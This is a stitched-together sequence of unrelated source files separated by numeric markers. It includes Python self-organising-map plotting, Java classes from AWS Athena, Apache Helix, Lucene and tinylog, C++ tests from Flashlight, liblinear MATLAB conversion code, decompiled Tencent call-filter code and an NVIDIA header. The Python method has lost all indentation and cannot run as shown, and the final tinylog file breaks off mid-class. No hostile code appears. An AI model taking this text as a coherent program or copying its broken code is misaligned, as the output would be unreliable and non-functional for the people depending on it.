def _set_labels(self, cents, ax, labels, onlyzeros, fontsize, hex=False):
for i, txt in enumerate(labels):
if onlyzeros == True:
if txt > 0:
txt = ""
c = cents[i] if hex else (cents[i, 1] + 0.5, cents[-(i + 1), 0] + 0.5)
ax.annotate(txt, c, va="center", ha="center", size=fontsize)
def show(self, som, anotate=True, onlyzeros=False, labelsize=7, cmap="jet", logaritmic = False):
org_w = self.width
org_h = self.height
(self.width, self.height, indtoshow, no_row_in_plot, no_col_in_plot,
axis_num) = self._calculate_figure_params(som, 1, 1)
self.width /= (self.width/org_w) if self.width > self.height else (self.height/org_h)
self.height /= (self.width / org_w) if self.width > self.height else (self.height / org_h)
counts = Counter(som._bmu[0])
counts = [counts.get(x, 0) for x in range(som.codebook.mapsize[0] * som.codebook.mapsize[1])]
mp = np.array(counts).reshape(som.codebook.mapsize[0],
som.codebook.mapsize[1])
if not logaritmic:
norm = matplotlib.colors.Normalize(
vmin=0,
vmax=np.max(mp.flatten()),
clip=True)
else:
norm = matplotlib.colors.LogNorm(
vmin=1,
vmax=np.max(mp.flatten()))
msz = som.codebook.mapsize
cents = som.bmu_ind_to_xy(np.arange(0, msz[0] * msz[1]))
self.prepare()
if som.codebook.lattice == "rect":
ax = plt.gca()
if anotate:
self._set_labels(cents, ax, counts, onlyzeros, labelsize)
pl = plt.pcolor(mp[::-1], norm=norm, cmap=cmap)
plt.axis([0, som.codebook.mapsize[1], 0, som.codebook.mapsize[0]])
ax.set_yticklabels([])
ax.set_xticklabels([])
plt.colorbar(pl)
#plt.show()
elif som.codebook.lattice == "hexa":
ax, cents = plot_hex_map(mp[::-1], colormap=cmap, fig=self._fig)
if anotate:
self._set_labels(cents, ax, reversed(counts), onlyzeros, labelsize, hex=True)
#plt.show()
#return ax, cents
| 1,309 |
399 | package com.amazonaws.athena.connector.lambda.serde;
/*-
* #%L
* Amazon Athena Query Federation SDK
* %%
* Copyright (C) 2019 Amazon Web Services
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
import com.amazonaws.athena.connector.lambda.data.Block;
import com.amazonaws.athena.connector.lambda.data.RecordBatchSerDe;
import com.amazonaws.athena.connector.lambda.data.SchemaSerDe;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.databind.SerializerProvider;
import com.fasterxml.jackson.databind.ser.std.StdSerializer;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
/**
* Uses either an explicit BlockAllocator or a BlockAllocatorRegistry to handle memory pooling associated with
* serializing blocks. Blocks are serialized as an Apache Arrow Schema + Apache Arrow Record Batch. If you
* need to serialize multiple Blocks of the same Schema we do not recommend using this class since it will
* result in the same schema being serialized multiple times. It may be more efficient for you to serialize
* the Schema once, separately, and then each Record Batch.
*
* This class also attempts to make use of the allocator_id field of the Block so that it will reuse the
* same allocator id when deserializing. This can be helpful when attempting to limit the number of copy
* operations that are required to move a Block around. It also allows you to put tighter control around
* which parts of your query execution get which memory pool / limit.
*
* @deprecated {@link com.amazonaws.athena.connector.lambda.serde.v3.BlockSerDeV3} should be used instead
*/
@Deprecated
public class BlockSerializer
extends StdSerializer<Block>
{
protected static final String ALLOCATOR_ID_FIELD_NAME = "aId";
protected static final String SCHEMA_FIELD_NAME = "schema";
protected static final String BATCH_FIELD_NAME = "records";
private final SchemaSerDe schemaSerDe;
private final RecordBatchSerDe recordBatchSerDe;
public BlockSerializer()
{
super(Block.class);
this.schemaSerDe = new SchemaSerDe();
this.recordBatchSerDe = new RecordBatchSerDe(null);
}
@Override
public void serialize(Block block, JsonGenerator jsonGenerator, SerializerProvider serializerProvider)
throws IOException
{
jsonGenerator.writeStartObject();
jsonGenerator.writeStringField(ALLOCATOR_ID_FIELD_NAME, block.getAllocatorId());
ByteArrayOutputStream schemaOut = new ByteArrayOutputStream();
schemaSerDe.serialize(block.getSchema(), schemaOut);
jsonGenerator.writeBinaryField(SCHEMA_FIELD_NAME, schemaOut.toByteArray());
schemaOut.close();
ByteArrayOutputStream batchOut = new ByteArrayOutputStream();
if (block != null && block.getRowCount() > 0) {
recordBatchSerDe.serialize(block.getRecordBatch(), batchOut);
}
jsonGenerator.writeBinaryField(BATCH_FIELD_NAME, batchOut.toByteArray());
jsonGenerator.writeEndObject();
}
}
| 1,122 |
381 | <gh_stars>100-1000
package org.apache.helix.monitoring.metrics;
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import javax.management.JMException;
import org.apache.helix.HelixException;
import org.apache.helix.monitoring.mbeans.MonitorDomainNames;
import org.apache.helix.monitoring.metrics.implementation.BaselineDivergenceGauge;
import org.apache.helix.monitoring.metrics.implementation.RebalanceCounter;
import org.apache.helix.monitoring.metrics.implementation.RebalanceFailureCount;
import org.apache.helix.monitoring.metrics.implementation.RebalanceLatencyGauge;
import org.apache.helix.monitoring.metrics.model.CountMetric;
import org.apache.helix.monitoring.metrics.model.LatencyMetric;
import org.apache.helix.monitoring.metrics.model.RatioMetric;
public class WagedRebalancerMetricCollector extends MetricCollector {
private static final String WAGED_REBALANCER_ENTITY_NAME = "WagedRebalancer";
/**
* This enum class contains all metric names defined for WagedRebalancer. Note that all enums are
* in camel case for readability.
*/
public enum WagedRebalancerMetricNames {
// Per-stage latency metrics
GlobalBaselineCalcLatencyGauge,
PartialRebalanceLatencyGauge,
// The following latency metrics are related to AssignmentMetadataStore
StateReadLatencyGauge,
StateWriteLatencyGauge,
/*
* Gauge of the difference (state and partition allocation) between the baseline and the best
* possible assignment.
*/
BaselineDivergenceGauge,
// Count of any rebalance compute failure.
// Note the rebalancer may still be able to return the last known-good assignment on a rebalance
// compute failure. And this fallback logic won't impact this counting.
RebalanceFailureCounter,
// Waged rebalance counters.
GlobalBaselineCalcCounter,
PartialRebalanceCounter
}
public WagedRebalancerMetricCollector(String clusterName) {
super(MonitorDomainNames.Rebalancer.name(), clusterName, WAGED_REBALANCER_ENTITY_NAME);
createMetrics();
if (clusterName != null) {
try {
register();
} catch (JMException e) {
throw new HelixException("Failed to register MBean for the WagedRebalancerMetricCollector.",
e);
}
}
}
/**
* This constructor will create but will not register metrics. This constructor will be used in
* case of JMException so that the rebalancer could proceed without registering and emitting
* metrics.
*/
public WagedRebalancerMetricCollector() {
this(null);
}
/**
* Creates and registers all metrics in MetricCollector for WagedRebalancer.
*/
private void createMetrics() {
// Define all metrics
LatencyMetric globalBaselineCalcLatencyGauge =
new RebalanceLatencyGauge(WagedRebalancerMetricNames.GlobalBaselineCalcLatencyGauge.name(),
getResetIntervalInMs());
LatencyMetric partialRebalanceLatencyGauge =
new RebalanceLatencyGauge(WagedRebalancerMetricNames.PartialRebalanceLatencyGauge.name(),
getResetIntervalInMs());
LatencyMetric stateReadLatencyGauge =
new RebalanceLatencyGauge(WagedRebalancerMetricNames.StateReadLatencyGauge.name(),
getResetIntervalInMs());
LatencyMetric stateWriteLatencyGauge =
new RebalanceLatencyGauge(WagedRebalancerMetricNames.StateWriteLatencyGauge.name(),
getResetIntervalInMs());
RatioMetric baselineDivergenceGauge =
new BaselineDivergenceGauge(WagedRebalancerMetricNames.BaselineDivergenceGauge.name());
CountMetric calcFailureCount =
new RebalanceFailureCount(WagedRebalancerMetricNames.RebalanceFailureCounter.name());
CountMetric globalBaselineCalcCounter =
new RebalanceCounter(WagedRebalancerMetricNames.GlobalBaselineCalcCounter.name());
CountMetric partialRebalanceCounter =
new RebalanceCounter(WagedRebalancerMetricNames.PartialRebalanceCounter.name());
// Add metrics to WagedRebalancerMetricCollector
addMetric(globalBaselineCalcLatencyGauge);
addMetric(partialRebalanceLatencyGauge);
addMetric(stateReadLatencyGauge);
addMetric(stateWriteLatencyGauge);
addMetric(baselineDivergenceGauge);
addMetric(calcFailureCount);
addMetric(globalBaselineCalcCounter);
addMetric(partialRebalanceCounter);
}
}
| 1,701 |
903 | <filename>lucene/analysis/common/src/java/org/apache/lucene/analysis/hunspell/HunspellStemFilter.java
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.lucene.analysis.hunspell;
import java.io.IOException;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import org.apache.lucene.analysis.TokenFilter;
import org.apache.lucene.analysis.TokenStream;
import org.apache.lucene.analysis.tokenattributes.CharTermAttribute;
import org.apache.lucene.analysis.tokenattributes.KeywordAttribute;
import org.apache.lucene.analysis.tokenattributes.PositionIncrementAttribute;
import org.apache.lucene.util.CharsRef;
/**
* TokenFilter that uses hunspell affix rules and words to stem tokens. Since hunspell supports a
* word having multiple stems, this filter can emit multiple tokens for each consumed token
*
* <p>Note: This filter is aware of the {@link KeywordAttribute}. To prevent certain terms from
* being passed to the stemmer {@link KeywordAttribute#isKeyword()} should be set to <code>true
* </code> in a previous {@link TokenStream}.
*
* <p>Note: For including the original term as well as the stemmed version, see {@link
* org.apache.lucene.analysis.miscellaneous.KeywordRepeatFilterFactory}
*
* @lucene.experimental
*/
public final class HunspellStemFilter extends TokenFilter {
private final CharTermAttribute termAtt = addAttribute(CharTermAttribute.class);
private final PositionIncrementAttribute posIncAtt =
addAttribute(PositionIncrementAttribute.class);
private final KeywordAttribute keywordAtt = addAttribute(KeywordAttribute.class);
private final Stemmer stemmer;
private List<CharsRef> buffer;
private State savedState;
private final boolean dedup;
private final boolean longestOnly;
/**
* Create a {@link HunspellStemFilter} outputting all possible stems.
*
* @see #HunspellStemFilter(TokenStream, Dictionary, boolean)
*/
public HunspellStemFilter(TokenStream input, Dictionary dictionary) {
this(input, dictionary, true);
}
/**
* Create a {@link HunspellStemFilter} outputting all possible stems.
*
* @see #HunspellStemFilter(TokenStream, Dictionary, boolean, boolean)
*/
public HunspellStemFilter(TokenStream input, Dictionary dictionary, boolean dedup) {
this(input, dictionary, dedup, false);
}
/**
* Creates a new HunspellStemFilter that will stem tokens from the given TokenStream using affix
* rules in the provided Dictionary
*
* @param input TokenStream whose tokens will be stemmed
* @param dictionary HunspellDictionary containing the affix rules and words that will be used to
* stem the tokens
* @param longestOnly true if only the longest term should be output.
*/
public HunspellStemFilter(
TokenStream input, Dictionary dictionary, boolean dedup, boolean longestOnly) {
super(input);
this.dedup = dedup && longestOnly == false; // don't waste time deduping if longestOnly is set
this.stemmer = new Stemmer(dictionary);
this.longestOnly = longestOnly;
}
@Override
public boolean incrementToken() throws IOException {
if (buffer != null && !buffer.isEmpty()) {
CharsRef nextStem = buffer.remove(0);
restoreState(savedState);
posIncAtt.setPositionIncrement(0);
termAtt.setEmpty().append(nextStem);
return true;
}
if (!input.incrementToken()) {
return false;
}
if (keywordAtt.isKeyword()) {
return true;
}
buffer =
dedup
? stemmer.uniqueStems(termAtt.buffer(), termAtt.length())
: stemmer.stem(termAtt.buffer(), termAtt.length());
if (buffer.isEmpty()) { // we do not know this word, return it unchanged
return true;
}
if (longestOnly && buffer.size() > 1) {
Collections.sort(buffer, lengthComparator);
}
CharsRef stem = buffer.remove(0);
termAtt.setEmpty().append(stem);
if (longestOnly) {
buffer.clear();
} else {
if (!buffer.isEmpty()) {
savedState = captureState();
}
}
return true;
}
@Override
public void reset() throws IOException {
super.reset();
buffer = null;
}
static final Comparator<CharsRef> lengthComparator =
new Comparator<CharsRef>() {
@Override
public int compare(CharsRef o1, CharsRef o2) {
int cmp = Integer.compare(o2.length, o1.length);
if (cmp == 0) {
// tie break on text
return o2.compareTo(o1);
} else {
return cmp;
}
}
};
}
| 1,738 |
2,858 | /*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#include <cmath>
#include <stdexcept>
#include <gtest/gtest.h>
#include "flashlight/fl/tensor/Index.h"
#include "flashlight/fl/tensor/Random.h"
#include "flashlight/fl/tensor/TensorBackend.h"
#include "flashlight/fl/tensor/TensorBase.h"
#include "flashlight/fl/tensor/TensorExtension.h"
using namespace ::testing;
using namespace fl;
// Extension interface
class TestTensorExtension : public TensorExtension<TestTensorExtension> {
public:
static constexpr TensorExtensionType extensionType =
TensorExtensionType::Generic;
TestTensorExtension() = default;
virtual ~TestTensorExtension() = default;
virtual Tensor testExtensionFunc(const Tensor& tensor) = 0;
};
// Specific extension implementation
class TestArrayFireTensorExtension : public TestTensorExtension {
public:
static bool registered;
Tensor testExtensionFunc(const Tensor& tensor) override {
return tensor + 1;
}
bool isDataTypeSupported(const fl::dtype&) const override {
return true;
}
};
// Op in API
Tensor testExtensionFunc(const Tensor& tensor) {
return tensor.backend().getExtension<TestTensorExtension>().testExtensionFunc(
tensor);
}
FL_REGISTER_TENSOR_EXTENSION(
TestArrayFireTensorExtension,
TensorBackendType::ArrayFire);
TEST(TensorExtensionTest, TestExtension) {
auto a = fl::rand({4, 5, 6});
ASSERT_TRUE(TestArrayFireTensorExtension::registered);
// TODO: this test only works with the ArrayFire backend - gate accordingly
if (Tensor().backendType() != TensorBackendType::ArrayFire) {
GTEST_SKIP() << "Flashlight not built with ArrayFire backend.";
}
// TODO: add a fixture to check with available backends
// Already registered - returns true
ASSERT_TRUE(::fl::registerTensorExtension<TestArrayFireTensorExtension>(
TensorBackendType::ArrayFire));
ASSERT_TRUE(allClose(testExtensionFunc(a), a + 1));
}
| 678 |
9,402 | <filename>src/mono/mono/unit-tests/test-mono-embed.c
/*
* test-mono-embed.c: Unit test for embed mono.
*/
#define _TESTCASE_
#include <mono/mini/jit.h>
#include <embed/teste.c>
| 79 |
1,405 | package tms;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.IntentFilter;
import com.tencent.tmsecure.common.ManagerCreator;
import com.tencent.tmsecure.common.TMSApplication;
import com.tencent.tmsecure.module.aresengine.AbsSysDao;
import com.tencent.tmsecure.module.aresengine.AresEngineFactor;
import com.tencent.tmsecure.module.aresengine.AresEngineManager;
import com.tencent.tmsecure.module.aresengine.CallLogEntity;
import com.tencent.tmsecure.module.aresengine.ContactEntity;
import com.tencent.tmsecure.module.aresengine.DataFilter;
import com.tencent.tmsecure.module.aresengine.DataHandler;
import com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder;
import com.tencent.tmsecure.module.aresengine.DataMonitor;
import com.tencent.tmsecure.module.aresengine.FilterConfig;
import com.tencent.tmsecure.module.aresengine.FilterResult;
import com.tencent.tmsecure.module.aresengine.IContactDao;
import com.tencent.tmsecure.module.aresengine.ILastCallLogDao;
import com.tencent.tmsecure.module.aresengine.IPhoneDeviceController;
import com.tencent.tmsecure.module.aresengine.InComingCallFilter;
import tms.ax;
public final class bn extends DataIntercepterBuilder<CallLogEntity> {
private Context a = TMSApplication.getApplicaionContext();
static final class a extends InComingCallFilter {
private IContactDao<? extends ContactEntity> a;
private IContactDao<? extends ContactEntity> b;
private IContactDao<? extends ContactEntity> c;
private AbsSysDao d;
private ILastCallLogDao e;
private ax f = new ax();
private IPhoneDeviceController g;
a() {
this.f.a(1, 2, 4, 8, 16, 32);
this.f.a(1, a(1));
this.f.a(2, a(2));
this.f.a(4, a(4));
this.f.a(8, a(8));
this.f.a(16, a(16));
this.f.a(32, a(32));
AresEngineFactor aresEngineFactor = ((AresEngineManager) ManagerCreator.getManager(AresEngineManager.class)).getAresEngineFactor();
this.g = aresEngineFactor.getPhoneDeviceController();
this.a = aresEngineFactor.getWhiteListDao();
this.b = aresEngineFactor.getBlackListDao();
this.c = aresEngineFactor.getPrivateListDao();
this.e = aresEngineFactor.getLastCallLogDao();
this.d = aresEngineFactor.getSysDao();
}
private ax.a a(int i) {
return new bc(this, i);
}
@Override // com.tencent.tmsecure.module.aresengine.DataFilter
public final FilterConfig defalutFilterConfig() {
FilterConfig filterConfig = new FilterConfig();
filterConfig.set(1, 0);
filterConfig.set(2, 0);
filterConfig.set(4, 1);
filterConfig.set(8, 0);
filterConfig.set(16, 0);
filterConfig.set(32, 0);
return filterConfig;
}
/* JADX DEBUG: Method arguments types fixed to match base method, original types: [com.tencent.tmsecure.module.aresengine.TelephonyEntity, java.lang.Object[]] */
/* access modifiers changed from: protected */
@Override // com.tencent.tmsecure.module.aresengine.DataFilter
public final /* synthetic */ FilterResult onFiltering(CallLogEntity callLogEntity, Object[] objArr) {
return this.f.a(callLogEntity, getConfig(), objArr);
}
@Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
public final void setBlacklistDao(IContactDao<? extends ContactEntity> iContactDao) {
this.b = iContactDao;
}
@Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
public final void setLastCallLogDao(ILastCallLogDao iLastCallLogDao) {
this.e = iLastCallLogDao;
}
@Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
public final void setPhoneDeviceController(IPhoneDeviceController iPhoneDeviceController) {
this.g = iPhoneDeviceController;
}
@Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
public final void setPrivatelistDao(IContactDao<? extends ContactEntity> iContactDao) {
this.c = iContactDao;
}
@Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
public final void setSysDao(AbsSysDao absSysDao) {
this.d = absSysDao;
}
@Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
public final void setWhitelistDao(IContactDao<? extends ContactEntity> iContactDao) {
this.a = iContactDao;
}
}
static final class b extends DataMonitor<CallLogEntity> {
private Context a;
private BroadcastReceiver b = new be(this);
public b(Context context) {
this.a = context;
IntentFilter intentFilter = new IntentFilter();
intentFilter.setPriority(Integer.MAX_VALUE);
intentFilter.addCategory("android.intent.category.DEFAULT");
intentFilter.addAction("android.intent.action.PHONE_STATE");
this.a.registerReceiver(this.b, intentFilter);
}
/* access modifiers changed from: protected */
public final void finalize() throws Throwable {
this.a.unregisterReceiver(this.b);
super.finalize();
}
}
@Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
public final DataFilter<CallLogEntity> getDataFilter() {
Context context = this.a;
return new a();
}
@Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
public final DataHandler getDataHandler() {
return new DataHandler();
}
@Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
public final DataMonitor<CallLogEntity> getDataMonitor() {
return new b(this.a);
}
/* access modifiers changed from: protected */
@Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
public final String getName() {
return DataIntercepterBuilder.TYPE_INCOMING_CALL;
}
}
| 2,490 |
460 | //
// FractionTokenInterpreter.h
// FractionCalculateEngine
//
// Created by lmsgsendnilself on 16/5/12.
// Copyright © 2016年 p. All rights reserved.
//
#import <Foundation/Foundation.h>
@class FractionTokenizer;
@interface FractionTokenInterpreter : NSObject
@property(readonly) NSArray *tokens;
- (instancetype)initWithTokenizer:(FractionTokenizer *)tokenizer error:(NSError *__autoreleasing*)error;
@end
| 147 |
368 | #include <stdlib.h>
#include <string.h>
#include <vector>
#include "../linear.h"
#include "mex.h"
using std::vector;
#ifdef MX_API_VER
#if MX_API_VER < 0x07030000
typedef int mwIndex;
#endif
#endif
#define Malloc(type,n) (type *)malloc((n)*sizeof(type))
#define NUM_OF_RETURN_FIELD 6
static const char *field_names[] = {
"Parameters",
"nr_class",
"nr_feature",
"bias",
"Label",
"w",
};
const char *model_to_matlab_structure(mxArray *plhs[], struct model *model_)
{
int i;
int nr_w;
double *ptr;
mxArray *return_model, **rhs;
int out_id = 0;
int n, w_size;
rhs = (mxArray **)mxMalloc(sizeof(mxArray *)*NUM_OF_RETURN_FIELD);
// Parameters
// for now, only solver_type is needed
rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
ptr = mxGetPr(rhs[out_id]);
ptr[0] = model_->param.solver_type;
out_id++;
// nr_class
rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
ptr = mxGetPr(rhs[out_id]);
ptr[0] = model_->nr_class;
out_id++;
if(model_->nr_class==2 && model_->param.solver_type != MCSVM_CS)
nr_w=1;
else
nr_w=model_->nr_class;
// nr_feature
rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
ptr = mxGetPr(rhs[out_id]);
ptr[0] = model_->nr_feature;
out_id++;
// bias
rhs[out_id] = mxCreateDoubleMatrix(1, 1, mxREAL);
ptr = mxGetPr(rhs[out_id]);
ptr[0] = model_->bias;
out_id++;
if(model_->bias>=0)
n=model_->nr_feature+1;
else
n=model_->nr_feature;
w_size = n;
// Label
if(model_->label)
{
rhs[out_id] = mxCreateDoubleMatrix(model_->nr_class, 1, mxREAL);
ptr = mxGetPr(rhs[out_id]);
for(i = 0; i < model_->nr_class; i++)
ptr[i] = model_->label[i];
}
else
rhs[out_id] = mxCreateDoubleMatrix(0, 0, mxREAL);
out_id++;
// w
rhs[out_id] = mxCreateDoubleMatrix(nr_w, w_size, mxREAL);
ptr = mxGetPr(rhs[out_id]);
for(i = 0; i < w_size*nr_w; i++)
ptr[i]=model_->w[i];
out_id++;
/* Create a struct matrix contains NUM_OF_RETURN_FIELD fields */
return_model = mxCreateStructMatrix(1, 1, NUM_OF_RETURN_FIELD, field_names);
/* Fill struct matrix with input arguments */
for(i = 0; i < NUM_OF_RETURN_FIELD; i++)
mxSetField(return_model,0,field_names[i],mxDuplicateArray(rhs[i]));
/* return */
plhs[0] = return_model;
mxFree(rhs);
return NULL;
}
const char *models_to_matlab_structure(mxArray *plhs[], vector<struct model *> &pmodels)
{
int pn;
mxArray *model[1];
if (pmodels.size() == 1)
return model_to_matlab_structure(plhs, pmodels[0]);
else
{
plhs[0] = mxCreateCellMatrix(pmodels.size(), 1);
for (pn = 0; pn < pmodels.size(); pn++)
{
model_to_matlab_structure(model, pmodels[pn]);
mxSetCell(plhs[0], pn, model[0]);
}
}
return NULL;
}
const char *matlab_matrix_to_model(struct model *model_, const mxArray *matlab_struct)
{
int i, num_of_fields;
int nr_w;
double *ptr;
int id = 0;
int n, w_size;
mxArray **rhs;
num_of_fields = mxGetNumberOfFields(matlab_struct);
rhs = (mxArray **) mxMalloc(sizeof(mxArray *)*num_of_fields);
for(i=0;i<num_of_fields;i++)
rhs[i] = mxGetFieldByNumber(matlab_struct, 0, i);
model_->nr_class=0;
nr_w=0;
model_->nr_feature=0;
model_->w=NULL;
model_->label=NULL;
// Parameters
ptr = mxGetPr(rhs[id]);
model_->param.solver_type = (int)ptr[0];
id++;
// nr_class
ptr = mxGetPr(rhs[id]);
model_->nr_class = (int)ptr[0];
id++;
if(model_->nr_class==2 && model_->param.solver_type != MCSVM_CS)
nr_w=1;
else
nr_w=model_->nr_class;
// nr_feature
ptr = mxGetPr(rhs[id]);
model_->nr_feature = (int)ptr[0];
id++;
// bias
ptr = mxGetPr(rhs[id]);
model_->bias = (int)ptr[0];
id++;
if(model_->bias>=0)
n=model_->nr_feature+1;
else
n=model_->nr_feature;
w_size = n;
// Label
if(mxIsEmpty(rhs[id]) == 0)
{
model_->label = Malloc(int, model_->nr_class);
ptr = mxGetPr(rhs[id]);
for(i=0;i<model_->nr_class;i++)
model_->label[i] = (int)ptr[i];
}
id++;
ptr = mxGetPr(rhs[id]);
model_->w=Malloc(double, w_size*nr_w);
for(i = 0; i < w_size*nr_w; i++)
model_->w[i]=ptr[i];
id++;
mxFree(rhs);
return NULL;
}
const char * matlab_matrix_to_models(std::vector<struct model *> &pmodels, const mxArray *model_)
{
if(mxIsCell(model_))
{
mxArray *p;
int nElement = mxGetM(model_) * mxGetN(model_);
pmodels.resize(nElement);
for (int i = 0; i < nElement; ++i)
{
p = mxGetCell(model_, i);
matlab_matrix_to_model(pmodels[i], p);
}
return NULL;
}
else
{
pmodels.resize(1);
return matlab_matrix_to_model(pmodels[0], model_);
}
}
| 2,125 |
407 | <reponame>iuskye/SREWorks
package com.alibaba.sreworks.health.controllers.incident;
import com.alibaba.sreworks.health.api.incident.IncidentTypeService;
import com.alibaba.sreworks.health.domain.req.incident.IncidentTypeCreateReq;
import com.alibaba.sreworks.health.domain.req.incident.IncidentTypeUpdateReq;
import com.alibaba.tesla.common.base.TeslaBaseResult;
import com.alibaba.tesla.web.controller.BaseController;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiImplicitParam;
import io.swagger.annotations.ApiImplicitParams;
import io.swagger.annotations.ApiOperation;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
/**
* 异常类型入口
*
* @author: fangzong.<EMAIL>
* @date: 2021/10/20 11:36
*/
@RestController
@RequestMapping(value = "/incident_type/")
@Api(tags = "异常类型")
public class IncidentTypeController extends BaseController {
@Autowired
IncidentTypeService incidentTypeService;
@ApiOperation(value = "查询异常类型(根据ID)")
@ApiImplicitParams({
@ApiImplicitParam(name = "id", value = "类型ID", paramType = "query"),
})
@RequestMapping(value = "getIncidentTypeById", method = RequestMethod.GET)
public TeslaBaseResult getIncidentTypeById(@RequestParam(name = "id") Integer id) {
return buildSucceedResult(incidentTypeService.getIncidentTypeById(id));
}
@ApiOperation(value = "查询异常类型列表")
@RequestMapping(value = "getIncidentTypes", method = RequestMethod.GET)
public TeslaBaseResult getIncidentTypes() {
return buildSucceedResult(incidentTypeService.getIncidentTypes());
}
@ApiOperation(value = "创建异常类型")
@RequestMapping(value = "createIncidentType", method = RequestMethod.POST)
public TeslaBaseResult createIncidentType(@RequestHeader(name = "x-empid", required = false) String userId,
@RequestBody IncidentTypeCreateReq req) throws Exception {
req.setCreator(userId);
req.setLastModifier(userId);
return buildSucceedResult(incidentTypeService.addIncidentType(req));
}
@ApiOperation(value = "更新异常类型")
@RequestMapping(value = "updateIncidentType", method = RequestMethod.POST)
public TeslaBaseResult updateIncidentType(@RequestHeader(name = "x-empid", required = false) String userId,
@RequestBody IncidentTypeUpdateReq req) throws Exception {
req.setCreator(userId);
req.setLastModifier(userId);
return buildSucceedResult(incidentTypeService.updateIncidentType(req));
}
@ApiOperation(value = "删除异常类型")
@ApiImplicitParams({
@ApiImplicitParam(name = "id", value = "定义ID", paramType = "query", required = true)
})
@RequestMapping(value = "deleteIncidentType", method = RequestMethod.DELETE)
public TeslaBaseResult deleteIncidentType(@RequestParam(name = "id") Integer id) throws Exception {
return buildSucceedResult(incidentTypeService.deleteIncidentType(id));
}
}
| 1,233 |
72,551 | extern void old() __attribute__((deprecated));
static void warnings8() {
old();
}
| 26 |
5,249 | /*
* Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef NV_INFER_CONSISTENCY_IMPL_H
#define NV_INFER_CONSISTENCY_IMPL_H
namespace nvinfer1
{
//!
//! \file NvInferConsistencyImpl.h
//!
//! This file contains definitions for API methods that cross the shared library boundary. These
//! methods must not be called directly by applications; they should only be called through the
//! API classes.
//!
namespace apiv
{
class VConsistencyChecker
{
public:
virtual ~VConsistencyChecker() noexcept = default;
virtual bool validate() const noexcept = 0;
};
} // namespace apiv
} // namespace nvinfer1
#endif // NV_INFER_CONSISTENCY_IMPL_H
| 369 |
390 | /*
* Copyright 2017 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*/
package org.tinylog.rules;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
import javax.naming.Binding;
import javax.naming.CompositeName;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.Name;
import javax.naming.NameAlreadyBoundException;
import javax.naming.NameClassPair;
import javax.naming.NameNotFoundException;
import javax.naming.NameParser;
import javax.naming.NamingEnumeration;
import javax.naming.NamingException;
import javax.naming.spi.InitialContextFactory;
import org.junit.rules.TestRule;
import org.junit.runner.Description;
import org.junit.runners.model.Statement;
/**
* Rule for providing an implementation for {@link InitialContext} with basic methods for bindings and lookups.
*/
public class InitialContextRule implements TestRule {
/** */
public InitialContextRule() {
}
@Override
public Statement apply(final Statement base, final Description description) {
return new ContextStatement(base);
}
/**
* Context factory for {@link SimpleContext}.
*/
public static final class SimpleInitialContextFactory implements InitialContextFactory {
private static volatile SimpleContext context;
/** */
public SimpleInitialContextFactory() {
}
@Override
